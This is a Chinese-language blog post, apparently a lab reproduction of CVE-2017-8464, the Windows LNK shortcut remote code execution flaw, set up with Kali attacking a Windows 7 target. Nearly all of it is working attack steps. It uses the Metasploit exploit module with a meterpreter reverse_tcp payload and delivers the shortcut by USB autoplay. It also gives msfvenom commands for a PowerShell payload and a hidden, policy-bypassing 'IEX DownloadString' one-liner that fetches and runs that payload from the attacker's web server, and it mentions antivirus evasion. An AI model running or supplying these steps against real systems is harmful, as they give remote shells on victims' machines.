欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

CVE-2017-8464复现

程序员文章站 2022-07-15 15:47:37
...

前言

CVE-2017-8464又称远程快捷方式漏洞
攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
注释:.LNK是用于指向其他文件的一种文件,这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。

漏洞复现

环境搭建
攻击机:kali IP:
靶机:win7 IP:
攻击方法一:
利用Metasploit中CVE-2017-8464模块制作快捷方式文件,通过U盘感染靶机

  • msf搜索漏洞利用模块:打开kali终端,输入
msfconsole
search cve-2017-8464
  • 如果搜索不到的话,证明你的msf应该更新了,具体更新方法百度即可

CVE-2017-8464复现

  • 使用攻击模块(这里可以使用Tab补全,也可以粘贴复制)
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
  • 使用攻击载荷(exploit是指利用漏洞的一个过程和方法,最终的目的是为了执行payload)
set payload windows/meterpreter/reverse_tcp
  • 看看哪些参数需要设置
show options

CVE-2017-8464复现

  • 设置参数:
  • set lhost [你的kali ip]
  • 选择靶机系统版本,这里默认即可
  • show targets

CVE-2017-8464复现

  • run或者exploit

CVE-2017-8464复现

  • 生成文件存放在/root/.msf4/local/***意.msf4是隐藏文件夹 可以使用cp命令复制生成的文件到自己的移动U盘里
  • 回到kai liunx,使用监听模块,输入以下代码
use multi/handler
set paylaod windows/meterpreter/reverse_tcp
set LHOST [你的IP地址]
run
  • 把U盘插入目标机,如果是设置了自动播放的话会直接运行

攻击方法二:
利用powershell远程快捷

  • 生成攻击文件:search.ps1,终端输入
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.118 -f psh-reflection>search.ps1
  • msfvenom是专门用来生成后门的 其中search.ps1是加载有payload的powershell脚本文件

  • 然后将目录下的search.ps1文件移动到/var/www/html/下

    随后打开Apache服务

service apache2 start
  • 验证一下是否可以访问到
  • 浏览器输入[你的kali ip]/search.ps1
  • 然后在目标机上建立一个powershell快捷方式,powershell因为其特殊性,被很多杀软直接忽视,实际情况下需要进行免杀处理,在攻击机上生成并且发送到靶机
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.118`/search.ps1');test.ps1"
  • 至于为什么要这么写 大家可以看看这个链接
  • 也可以输入System.Net.Webclient).DownloadString(‘http://你的kali ip/search.ps1’)建立一个txt文件
https://blog.csdn.net/qq_27446553/article/details/45966489?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task
  • 再到本机上配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [你的kali ip]
run

双击靶机上的powershell.exe,即可在kali机器上执行shell